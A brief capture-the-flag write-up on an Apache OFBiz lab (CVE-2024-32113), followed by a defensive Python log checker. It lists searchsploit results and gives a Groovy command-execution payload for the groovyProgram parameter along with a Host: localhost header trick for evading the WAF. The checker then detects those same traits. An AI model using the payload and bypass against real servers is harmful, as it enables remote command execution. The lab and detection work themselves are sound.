春秋云境 (Chunqiu Yunjing): CVE-2024-32113-Apache_OFBiz
```
➜  CVE-2024-36104 searchsploit apache ofbiz
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                        |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Apache OFBiz - Admin Creator                                          | multiple/remote/12264.txt
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities          | php/webapps/12330.txt
Apache OFBiz - Remote Execution (via SQL Execution)                   | multiple/remote/12263.txt
Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities   | multiple/remote/38230.txt
Apache OFBiz 16.11.04 - XML External Entity Injection                 | java/webapps/45673.py
Apache OFBiz 16.11.05 - Cross-Site Scripting                          | multiple/webapps/45975.txt
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) | java/webapps/48408.txt
Apache OFBiz 18.12.12 - Directory Traversal                           | java/webapps/52020.txt
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)                 | java/webapps/50178.sh
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
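I did not find an RCE exploit matching this version. The directory traversal vulnerability listed here can in fact also be used to read the flag, but I did not manage to reproduce it. Searching online turned up a related vulnerability: the back end processes malicious code in the groovyProgram parameter submitted via POST.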

The parameter passed in is: throw new Exception('cat /flag'.execute().text);
Note: the Host: localhost header must be added; otherwise the request is intercepted by the WAF and returns an error.
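
For reviewing request logs on the defending side, the two traits noted above (a POST body carrying groovyProgram with a process-launching call, and a Host: localhost header on a request from a remote client) can be checked as follows. This is an added example, not code from the original write-up or from OFBiz; the record layout, finding names and sample requests are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Groovy/Java constructs that start an OS process; '.execute()' is the one in the write-up.
EXEC_PATTERNS = re.compile(r"\.execute\s*\(|Runtime\.getRuntime|ProcessBuilder")
LOOPBACK_NAMES = {"localhost", "127.0.0.1"}

def inspect_request(req):
    """Return a list of finding names for one logged request (hypothetical dict layout)."""
    findings = []
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    # A remote client claiming a loopback Host is trying to look like local traffic.
    host = headers.get("host", "").split(":")[0].strip().lower()
    remote = not ipaddress.ip_address(req["src_ip"]).is_loopback
    if host in LOOPBACK_NAMES and remote:
        findings.append("loopback-host-from-remote")
    # parse_qs URL-decodes the form body, so encoded scripts are inspected in clear text.
    if req.get("method", "").upper() == "POST":
        form = parse_qs(req.get("body", ""), keep_blank_values=True)
        for script in form.get("groovyProgram", []):
            findings.append("groovyProgram-present")
            if EXEC_PATTERNS.search(script):
                findings.append("groovy-process-exec")
    return findings

# Constructed sample records (documentation IP ranges, made-up host names).
SAMPLES = [
    {"src_ip": "203.0.113.7", "method": "POST",
     "headers": {"Host": "localhost"},
     "body": "groovyProgram=throw+new+Exception%28%27cat+%2Fflag%27"
             ".execute%28%29.text%29%3B"},
    {"src_ip": "198.51.100.20", "method": "POST",
     "headers": {"Host": "erp.example.com"},
     "body": "USERNAME=alice&PASSWORD=x"},
    {"src_ip": "127.0.0.1", "method": "GET",
     "headers": {"Host": "localhost:8443"}, "body": ""},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample["src_ip"], inspect_request(sample))
```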